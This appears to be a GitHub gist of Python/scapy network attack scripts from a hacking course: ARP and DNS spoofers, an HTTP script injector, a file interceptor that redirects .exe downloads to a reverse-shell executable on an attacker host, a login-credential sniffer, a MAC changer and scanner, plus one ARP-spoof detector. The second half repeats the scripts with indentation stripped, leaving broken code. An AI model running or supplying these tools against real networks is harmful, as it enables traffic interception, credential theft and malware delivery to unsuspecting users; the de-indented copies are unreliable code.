ztothez · February 2, 2019 19:54
diff --git a/arp_spoof.py b/arp_spoof.py
 #!/usr/bin/env python

 import scapy.all as scapy
 import time
 import sys

 def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc


 def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)


 def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)


 target_ip = "192.168.10.134"
 gateway_ip = "192.168.10.2"


 try:
    sent_packets_count = 0
    while True:
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        sent_packets_count = sent_packets_count + 2
        print("\r[+] Packets sent: " + str(sent_packets_count)),
        sys.stdout.flush()
        time.sleep(2)
 except KeyboardInterrupt:
    print("[+] Detected CTRL + C ..... Resetting ARP tables...... Please wait.")
    restore(target_ip, gateway_ip)
    restore(gateway_ip, target_ip)
diff --git a/arpspoof_detector.py b/arpspoof_detector.py
 import scapy.all as scapy


 def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc


 def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


 def process_sniffed_packet(packet):
    if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op == 2:
        try:
            real_mac = get_mac(packet[scapy.ARP].psrc)
            response_mac = packet[scapy.ARP].hwsrc

            if real_mac != response_mac:
                print("[+] You are under attack!!")
        except IndexError:
            pass


 sniff("eth0")
diff --git a/code_injector.py b/code_injector.py
 #! /usr/bin/env python

 import netfilterqueue
 import scapy.all as scapy
 import re


 def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet


 def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        load = scapy_packet[scapy.Raw].load
        if scapy_packet.haslayer(scapy.TCP):

            if scapy_packet[scapy.TCP].dport == 80:
                print("[+] Request")
                load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
                load = load.replace("HTTP/1.1", "HTTP/1.0")

        elif scapy_packet[scapy.TCP].sport == 80:
            print("[+] Response")
            injection_code = "<script>alert('XSS');</script>"
            load = load.replace("</body>", injection_code + "</body>")
            content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
            if content_length_search:
                content_length = content_length_search.group(1)
                new_content_length = int(content_length) + len(injection_code)
                load = load.replace(content_length, str(new_content_length))

        if load != scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet))

    packet.accept()


 queue = netfilterqueue.NetfilterQueue()
 queue.bind(0, process_packet)
 queue.run()
diff --git a/dns_spoofer.py b/dns_spoofer.py
 #! /usr/bin/env python
 import netfilterqueue
 import scapy.all as scapy


 def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.dapthecontract.com" in qname:
            print("[+] Spoofing target")
            answer = scapy.DNSRR(rrname=qname, rdata="192.168.10.128")
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1

            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len

            packet.set_payload(str(scapy_packet))

    packet.accept()


 queue = netfilterqueue.NetfilterQueue()
 queue.bind(0, process_packet)
 queue.run()
diff --git a/file_interceptor.py b/file_interceptor.py
 #! /usr/bin/env python

 import netfilterqueue
 import scapy.all as scapy

 ack_list = []

 def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

 def process_packet(packet):

    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                print("Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.10.128/rev_https_8888.exe\n\n")

                packet.set_payload(str(modified_packet))

    packet.accept()


 queue = netfilterqueue.NetfilterQueue()
 queue.bind(0, process_packet)
 queue.run()
diff --git a/gistfile1.txt b/gistfile1.txt
 #! /usr/bin/env python

 import netfilterqueue
 import scapy.all as scapy
 import re


 def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet


 def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        load = scapy_packet[scapy.Raw].load
        if scapy_packet.haslayer(scapy.TCP):

            if scapy_packet[scapy.TCP].dport == 80:
                print("[+] Request")
                load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
                load = load.replace("HTTP/1.1", "HTTP/1.0")

        elif scapy_packet[scapy.TCP].sport == 80:
            print("[+] Response")
            injection_code = "<script>alert('XSS');</script>"
            load = load.replace("</body>", injection_code + "</body>")
            content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
            if content_length_search:
                content_length = content_length_search.group(1)
                new_content_length = int(content_length) + len(injection_code)
                load = load.replace(content_length, str(new_content_length))

        if load != scapy_packet[scapy.Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet))

    packet.accept()


 queue = netfilterqueue.NetfilterQueue()
 queue.bind(0, process_packet)
 queue.run()
diff --git a/gistfile2.txt b/gistfile2.txt
 #! /usr/bin/env python

 import netfilterqueue
 import scapy.all as scapy

 ack_list = []

 def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet

 def process_packet(packet):

    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        if scapy_packet[scapy.TCP].dport == 80:
            if ".exe" in scapy_packet[scapy.Raw].load:
                print("[+] exe Request")
                ack_list.append(scapy_packet[scapy.TCP].ack)
        elif scapy_packet[scapy.TCP].sport == 80:
            if scapy_packet[scapy.TCP].seq in ack_list:
                print("Replacing file")
                modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.10.128/rev_https_8888.exe\n\n")

                packet.set_payload(str(modified_packet))

    packet.accept()


 queue = netfilterqueue.NetfilterQueue()
 queue.bind(0, process_packet)
 queue.run()
diff --git a/macchanger.py b/macchanger.py
 #! /usr/bin/env python

 import subprocess
 import optparse
 import re


 def get_arguments():
    parser = optparse.OptionParser()
    parser.add_option("-i", "--interface", dest="interface", help="Interface to change its MAC address")
    parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address")
    (options, arguments) = parser.parse_args()
    if not options.interface:
        parser.error("[-] Please specify an interface, use --help for more info.")
    elif not options.new_mac:
        parser.error("[-] Please specify a new mac , use --help for more info.")
    return options


 def change_mac(interface, new_mac):
    print("[+] Changing MAC address for " + interface + " to " + new_mac)

    subprocess.call(["ifconfig", interface, "down"])
    subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
    subprocess.call(["ifconfig", interface, "up"])


 def get_current_mac(interface):
    ifconfig_result = subprocess.check_output(["ifconfig", interface])
    mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result)

    if mac_address_search_result:
        return mac_address_search_result.group(0)
    else:
        print("[-] Could not read MAC address.")


 options = get_arguments()

 current_mac = get_current_mac(options.interface)
 print("Current MAC = " + str(current_mac))

 change_mac(options.interface, options.new_mac)

 current_mac = get_current_mac(options.interface)
 if current_mac == options.new_mac:
    print("[+] MAC address was successfully changed to " + current_mac)
 else:
    print("[-] MAC address did not get changed.")
diff --git a/network_scanner.py b/network_scanner.py
 #! /usr/bin/env python

 import scapy.all as scapy
 import argparse


 def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", help="specify network to scan including /mask e.g 192.168.0.1/24")
    options = parser.parse_args()
    if not options.target:
        parser.error("[-] Please specify an network, use --help for more info.")
    return options

 def scan(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    clients_list = []
    for element in answered_list:
        client_dict = {"ip": element[1].psrc, "MAC": element[1].hwsrc}
        clients_list.append(client_dict)
    return clients_list


 def print_result(results_list):
    print("IP\t\t\tMAC Address\n-------------------------------------------")
    for client in results_list:
        print(client["ip"] + "\t\t" + client["MAC"])

 options = get_arguments()
 scan_result = scan(options.target)
 print_result(scan_result)
diff --git a/packet_sniffer.py b/packet_sniffer.py
 #! /usr/bin/env
 import scapy.all as scapy
 from scapy.layers import http


 def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

 def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

 def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["username", "user", "login", "password", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load

 def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request  >> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")


 sniff("eth0")
	#!/usr/bin/env python

	import scapy.all as scapy
	import time
	import sys

	def get_mac(ip):
	arp_request = scapy.ARP(pdst=ip)
	broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
	arp_request_broadcast = broadcast/arp_request
	answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

	return answered_list[0][1].hwsrc


	def spoof(target_ip, spoof_ip):
	target_mac = get_mac(target_ip)
	packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
	scapy.send(packet, verbose=False)


	def restore(destination_ip, source_ip):
	destination_mac = get_mac(destination_ip)
	source_mac = get_mac(source_ip)
	packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
	scapy.send(packet, count=4, verbose=False)


	target_ip = "192.168.10.134"
	gateway_ip = "192.168.10.2"


	try:
	sent_packets_count = 0
	while True:
	spoof(target_ip, gateway_ip)
	spoof(gateway_ip, target_ip)
	sent_packets_count = sent_packets_count + 2
	print("\r[+] Packets sent: " + str(sent_packets_count)),
	sys.stdout.flush()
	time.sleep(2)
	except KeyboardInterrupt:
	print("[+] Detected CTRL + C ..... Resetting ARP tables...... Please wait.")
	restore(target_ip, gateway_ip)
	restore(gateway_ip, target_ip)
	#! /usr/bin/env python

	import netfilterqueue
	import scapy.all as scapy
	import re


	def set_load(packet, load):
	packet[scapy.Raw].load = load
	del packet[scapy.IP].len
	del packet[scapy.IP].chksum
	del packet[scapy.TCP].chksum
	return packet


	def process_packet(packet):
	scapy_packet = scapy.IP(packet.get_payload())
	if scapy_packet.haslayer(scapy.Raw):
	load = scapy_packet[scapy.Raw].load
	if scapy_packet.haslayer(scapy.TCP):

	if scapy_packet[scapy.TCP].dport == 80:
	print("[+] Request")
	load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
	load = load.replace("HTTP/1.1", "HTTP/1.0")

	elif scapy_packet[scapy.TCP].sport == 80:
	print("[+] Response")
	injection_code = "<script>alert('XSS');</script>"
	load = load.replace("</body>", injection_code + "</body>")
	content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
	if content_length_search:
	content_length = content_length_search.group(1)
	new_content_length = int(content_length) + len(injection_code)
	load = load.replace(content_length, str(new_content_length))

	if load != scapy_packet[scapy.Raw].load:
	new_packet = set_load(scapy_packet, load)
	packet.set_payload(str(new_packet))

	packet.accept()


	queue = netfilterqueue.NetfilterQueue()
	queue.bind(0, process_packet)
	queue.run()
	#! /usr/bin/env python

	import subprocess
	import optparse
	import re


	def get_arguments():
	parser = optparse.OptionParser()
	parser.add_option("-i", "--interface", dest="interface", help="Interface to change its MAC address")
	parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address")
	(options, arguments) = parser.parse_args()
	if not options.interface:
	parser.error("[-] Please specify an interface, use --help for more info.")
	elif not options.new_mac:
	parser.error("[-] Please specify a new mac , use --help for more info.")
	return options


	def change_mac(interface, new_mac):
	print("[+] Changing MAC address for " + interface + " to " + new_mac)

	subprocess.call(["ifconfig", interface, "down"])
	subprocess.call(["ifconfig", interface, "hw", "ether", new_mac])
	subprocess.call(["ifconfig", interface, "up"])


	def get_current_mac(interface):
	ifconfig_result = subprocess.check_output(["ifconfig", interface])
	mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result)

	if mac_address_search_result:
	return mac_address_search_result.group(0)
	else:
	print("[-] Could not read MAC address.")


	options = get_arguments()

	current_mac = get_current_mac(options.interface)
	print("Current MAC = " + str(current_mac))

	change_mac(options.interface, options.new_mac)

	current_mac = get_current_mac(options.interface)
	if current_mac == options.new_mac:
	print("[+] MAC address was successfully changed to " + current_mac)
	else:
	print("[-] MAC address did not get changed.")
	#! /usr/bin/env python

	import scapy.all as scapy
	import argparse


	def get_arguments():
	parser = argparse.ArgumentParser()
	parser.add_argument("-t", "--target", dest="target", help="specify network to scan including /mask e.g 192.168.0.1/24")
	options = parser.parse_args()
	if not options.target:
	parser.error("[-] Please specify an network, use --help for more info.")
	return options

	def scan(ip):
	arp_request = scapy.ARP(pdst=ip)
	broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
	arp_request_broadcast = broadcast / arp_request
	answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

	clients_list = []
	for element in answered_list:
	client_dict = {"ip": element[1].psrc, "MAC": element[1].hwsrc}
	clients_list.append(client_dict)
	return clients_list


	def print_result(results_list):
	print("IP\t\t\tMAC Address\n-------------------------------------------")
	for client in results_list:
	print(client["ip"] + "\t\t" + client["MAC"])

	options = get_arguments()
	scan_result = scan(options.target)
	print_result(scan_result)
	#! /usr/bin/env
	import scapy.all as scapy
	from scapy.layers import http


	def sniff(interface):
	scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

	def get_url(packet):
	return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

	def get_login_info(packet):
	if packet.haslayer(scapy.Raw):
	load = packet[scapy.Raw].load
	keywords = ["username", "user", "login", "password", "pass"]
	for keyword in keywords:
	if keyword in load:
	return load

	def process_sniffed_packet(packet):
	if packet.haslayer(http.HTTPRequest):
	url = get_url(packet)
	print("[+] HTTP Request >> " + url)

	login_info = get_login_info(packet)
	if login_info:
	print("\n\n[+] Possible username/password > " + login_info + "\n\n")


	sniff("eth0")